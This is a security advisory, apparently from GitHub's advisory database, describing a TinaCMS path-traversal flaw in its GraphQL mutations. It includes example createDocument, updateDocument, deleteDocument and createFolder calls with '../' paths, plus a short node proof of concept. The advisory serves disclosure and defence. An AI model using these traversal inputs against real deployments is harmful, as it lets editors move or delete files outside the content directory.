+ "details": "### Description\n\nTinaCMS allows users to create, update, and delete content documents using relative file paths (`relativePath`, `newRelativePath`) via GraphQL mutations. Under certain conditions, these paths are combined with the collection path using `path.join()` without validating that the resolved path remains within the collection root directory.\n\nBecause `path.join()` does not prevent directory traversal, paths containing `../` sequences can escape the intended directory boundary.\n\n### Attack Vectors\n\n1. **File Creation**: Create files outside the collection directory\n ```graphql\n createDocument(\n collection: \"post\"\n relativePath: \"../../config/malicious.md\"\n params: { post: { title: \"malicious\" } }\n )\n ```\n\n2. **File Move/Rename**: Move existing files outside the collection\n ```graphql\n updateDocument(\n collection: \"post\"\n relativePath: \"existing.md\"\n params: { relativePath: \"../../stolen.md\" }\n )\n ```\n\n3. **File Deletion**: Delete files outside the collection\n ```graphql\n deleteDocument(\n collection: \"post\"\n relativePath: \"../../important-config.md\"\n )\n ```\n\n4. **Folder Creation**: Create folders outside the collection\n ```graphql\n createFolder(\n collection: \"post\"\n relativePath: \"../../malicious-folder\"\n )\n ```\n\n## Impact\n\nAn authenticated user with document mutation permissions can:\n\n- **Create content files** outside collection boundaries (subject to schema validation)\n- **Move or rename files** outside collection boundaries\n- **Delete content files** outside collection boundaries\n- **Read file contents** via document retrieval mutations\n\n## Mitigating Factors\n\nSeveral constraints limit the practical impact of this vulnerability:\n\n1. **Schema Validation**: Created/updated content must conform to the collection's GraphQL schema. Attackers cannot write arbitrary file content—the `params` argument is validated against the generated mutation types (e.g., `PostMutation`).\n\n2. **Authentication Required**: Exploitation requires authenticated access with CMS editor permissions. Anonymous users cannot access GraphQL mutations.\n\n3. **Git Tracking**: In typical deployments, all file operations are tracked in git (either via GitHub API for Tina Cloud/self-hosted with GitProvider, or local filesystem changes). Malicious changes are visible in version control and can be reverted.\n\n### What This Vulnerability Does NOT Allow\n\n- Writing arbitrary file content (content is schema-validated)\n- Silent/untracked file modifications (changes appear in git)\n- Unauthenticated access\n\n## Proof of Concept\n\nSee `packages/@tinacms/graphql/tests/path-traversal-security/index.test.ts` for automated tests demonstrating the vulnerability.\n\nManual reproduction:\n```bash\nnode -e \"\nconst path = require('path');\n\nconst collectionPath = 'content/posts';\nconst maliciousRelativePath = '../../OUTSIDE/poc.md';\n\nconst realPath = path.join(collectionPath, maliciousRelativePath);\nconsole.log('Resolved path:', realPath);\n// Output: OUTSIDE/poc.md (escaped content/posts)\n\"\n```",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments